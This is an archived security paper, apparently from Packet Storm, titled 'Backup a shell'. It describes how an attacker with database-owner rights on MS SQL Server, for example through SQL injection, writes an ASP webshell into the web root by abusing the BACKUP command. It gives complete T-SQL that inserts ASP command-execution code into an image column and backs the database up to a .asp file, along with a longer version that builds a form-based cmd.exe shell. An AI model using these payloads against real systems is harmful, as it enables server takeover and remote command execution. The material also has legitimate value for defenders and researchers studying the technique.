exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New


Posted Oct 24, 2004
Authored by Swan | Site 0x557.org

This is a small text document that describes how MS SQL can be "tricked" into creating a command.asp script under the webroot, even when you do not have access to 'sa' privs (dbo privs are probably still a must, though). The technique described uses the SQL server 'backup' command.

tags | paper, web, asp
SHA-256 | 00f4e7c9f7cd17235e6b6b60f335065c99183f5e4af191f5b7d9dfcb8975e8a2


Change Mirror Download
[Backup a shell]
From : SST (www.0x557.org)
Author : Swan (Swan[at]0x557[dot]org)

This article is about how to get a webshell when SQL Injecting under MSSQL database. The method seems work well since the day I found her(July 2003). You don't need the sa privilege, just a dbowner is Okay.
Open your Query Analyzer, following steps will generate a strange but useable webshell(suppose your web root is g:\wwwtest and the database model is intact)

use model;
create table cmd (str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='g:\wwwtest\l.asp';

Click run and the database model has been backuped into the web publish directory. Download? No, visit this file, you have got the shell...

Here is the explanation: the ASP(VB) interpreter will ignore the characters those not between "<%" and "%>", so naming the backup file as .asp and visiting it won't cause a 500 error if it contains no "<%" nor "%>". By default, the database stores its data in a "loose" way(e.g. the stored string "Time" will be seen in the backup file as the type of "T i m e"), so the probability that the backup file contains "<%" or "%>" is low. These are two preconditions.
But how we could make it a webshell? The storage mode of image or bin type is different, the data in the backup file appear exactly the format of what we have wrote, that is, those what we insert into the table/database with the type of image will NOT be output in the "loose" way in the backup file, but the original format. Once we create a table with a image segment and insert some evil codes, we could backup a shell!

Er, here also are some cons:

1) the output directort should be the physical web directory. Usually, we can only guess. For virtual host, perhaps we could reveal the path in other sites and other ways.
2) the database visitor should have the backup privilege. Some abnormal webmaster gave only select and insert privilege, once you meet such webmaster, abandon this way.

Here are the pros:
1) it will give you the webshell once your have the backup privilege. A dbowner have that!
2) it gives a new method of putting backdoor. Suppose your database is ACCESS, and you name it .asp to prevent from downloading. It COULD be a webshell ;)
3) ...

Oh, I nearly forget the most important thing: data which are in different insert phrases are NOT tangent, that means if your webshell codes are too long, you should do as the follow:

========= CUT ME HERE ======================================================
use model
create table cmd (str image);
insert into cmd(str) values ('<% Dim oScript %>');
insert into cmd(str) values ('<% Dim oScriptNet%>');
insert into cmd(str) values ('<% Dim oFileSys, oFile%>');
insert into cmd(str) values ('<% Dim szCMD, szTempFile%>');
insert into cmd(str) values ('<% Set oScript = Server.CreateObject("WSCRIPT.SHELL")%>');
insert into cmd(str) values ('<% Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")%>');
insert into cmd(str) values ('<% Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")%>');
insert into cmd(str) values ('<% szCMD = Request.Form(".CMD")%>');
insert into cmd(str) values ('<% If (szCMD <> "") Then%>');
insert into cmd(str) values ('<% szTempFile = "C:\" & oFileSys.GetTempName()%>');
insert into cmd(str) values ('<% Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)%>');
insert into cmd(str) values ('<% Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)%>');
insert into cmd(str) values ('<% End If %>');
insert into cmd(str) values ('<HTML><BODY><FORM action="<%= Request.ServerVariables("URL") %>" method="POST">');
insert into cmd(str) values ('<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"></FORM><PRE>');
insert into cmd(str) values ('<% If (IsObject(oFile)) Then%>');
insert into cmd(str) values ('<% On Error Resume Next%>');
insert into cmd(str) values ('<% Response.Write Server.HTMLEncode(oFile.ReadAll)%>');
insert into cmd(str) values ('<% oFile.Close%>');
insert into cmd(str) values ('<% Call oFileSys.DeleteFile(szTempFile, True)%>');
insert into cmd(str) values ('<% End If%>');
insert into cmd(str) values ('</BODY></HTML>');
backup database model to disk='c:\l.asp';
========= CUT ME HERE ======================================================

To those who did not successfully get the shell:
Make your testing database(e.g. model) INTACT.

To those who surf on the web:
declare @a sysname; select @a=db_name()

To those who thought it is too simple:
Try the way backup log or think about how to access all file in a similar way ;)

All SST Members.
Yang Shuo, my girl friend.
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    18 Files
  • 21
    Jun 21st
    8 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By